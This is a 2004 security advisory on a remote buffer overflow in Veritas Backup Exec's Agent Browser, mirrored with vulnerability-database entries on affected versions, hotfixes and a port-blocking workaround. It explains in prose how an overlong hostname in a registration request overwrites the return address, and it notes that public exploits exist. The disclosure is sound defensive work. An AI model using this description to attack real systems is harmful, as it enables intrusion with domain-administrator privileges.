iDEFENSE Security Advisory 12.16.04
http://www.idefense.com/application/poi/display?id=169
December 16, 2004

I. BACKGROUND

Backup Exec is a next generation backup and restore solution for
Microsoft Windows server environments. More information is available
here:

http://veritas.com/Products/www?c=product&refId=57

II. DESCRIPTION

Remote exploitation of a stack-based buffer overflow vulnerability in
Veritas Backup Exec allows attackers to execute arbitrary code.

The vulnerability specifically exists within the function responsible
for receiving and parsing registration requests. The registration
request packet contains the hostname and connecting TCP port of the
client which is stored in an array on the stack. An attacker can send a
registration request with an overly long hostname value to overflow the
array and take control of the saved return address to execute arbitrary
code.

III. ANALYSIS

Successful exploitation does not require authentication thereby allowing
any remote attacker to execute arbitrary code under the privileges of
the Backup Exec Agent Browser (benetns.exe) process which is usually a
domain administrative account.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in Backup
Exec for Windows Servers 9.1.

V. WORKAROUND

Use a firewall to restrict incoming connections to trusted workstations
running the Backup Exec client software.

VI. VENDOR RESPONSE

8.60.3878 Hotfix 68 - Backup Exec
(Buffer overflow creates a security hole in Agent Browser)

   http://seer.support.veritas.com/docs/273422.htm

9.1.4691 Hotfix 40 - Backup Exec
(Buffer overflow creates a security hole in Agent Browser;
Licensed Storage Central becomes Eval when Backup Exec 9.1 is uninstalled)
*Requires Backup Exec 9.1.4691 Service Pack 1

   http://seer.support.veritas.com/docs/273420.htm

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
names CAN-2004-1172 to these issues. This is a candidate for inclusion
in the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/02/2004   Initial vendor contact
12/16/2004   Initial vendor response
12/16/2004   Public disclosure

IX. CREDIT

An anonymous contributor and Patrik Karlsson (http://www.cqure.net) are
credited with discovering this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

X. LEGAL NOTICES

Copyright (c) 2004 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an as is condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

    

- 漏洞信息

12418
VERITAS Backup Exec Registration Request Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Workaround, Upgrade
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

A remote overflow exists in Veritas Backup Exec for Windows. The name server registration service (benetns.exe) fails to validate the client hostname field during the registration process, resulting in a stack-based buffer overflow. With a specially crafted request, an attacker can cause custom code to run in the processes's current context, which is typically that of domain administrator. This can result in a loss of integrity.

- 时间线

2004-12-16 2004-11-02
2005-01-05 2005-02-08

- 解决方案

Upgrade to version 8.60.3878 Hotfix 68 or version 9.1.4691 Hotfix 40 or higher, as both have been reported by the vendor to fix this vulnerability. It is also possible to mitigate the flaw by implementing the following workaround(s): Disallow untrusted clients to connect to the affected service by blocking access to the Generic Remote File System (GRFS) port (usually 6101/TCP).

- 相关参考

- 漏洞作者

- 漏洞信息

VERITAS Backup Exec Agent Browser Remote Buffer Overflow Vulnerability
Boundary Condition Error 11974
Yes No
2004-12-16 12:00:00 2007-11-01 09:56:00
This issue is credited to an anonymous researcher and Patrik Karlsson.

- 受影响的程序版本

Veritas Software Backup Exec for Windows Servers 9.1
Veritas Software Backup Exec for Windows Servers 9.0
Veritas Software Backup Exec for Windows Servers 8.6.3878
Veritas Software Backup Exec for Windows Servers 8.6
Veritas Software Backup Exec for Windows Servers 8.5.3572
Veritas Software Backup Exec for Windows Servers 8.5
Veritas Software Backup Exec for Windows Servers 8.0.3315
Veritas Software Backup Exec for Windows Servers 8.0
Veritas Software Backup Exec for Windows Servers 7.3.2575

- 漏洞讨论

Veritas Backup Exec is prone to a remote buffer-overflow vulnerability because the application fails to carry out proper boundary checks before copying user-supplied data into sensitive process buffers. A remote attacker can exploit this issue to execute arbitrary code on a vulnerable computer leading to a complete compromise.

This issue presents itself in an unspecified function that is responsible for handling registration requests. This function is part of the Agent Browser service code.

- 漏洞利用

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

An exploit has been released as part of the MetaSploit Framework 2.3.

An additional exploit has been released.

- 解决方案

Veritas has released an advisory (Document ID: 273419) with fix information to address this issue in Backup Exec 8.6 and Backup Exec 9.1. Please see the references for more information.


Veritas Software Backup Exec for Windows Servers 8.6

Veritas Software Backup Exec for Windows Servers 9.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站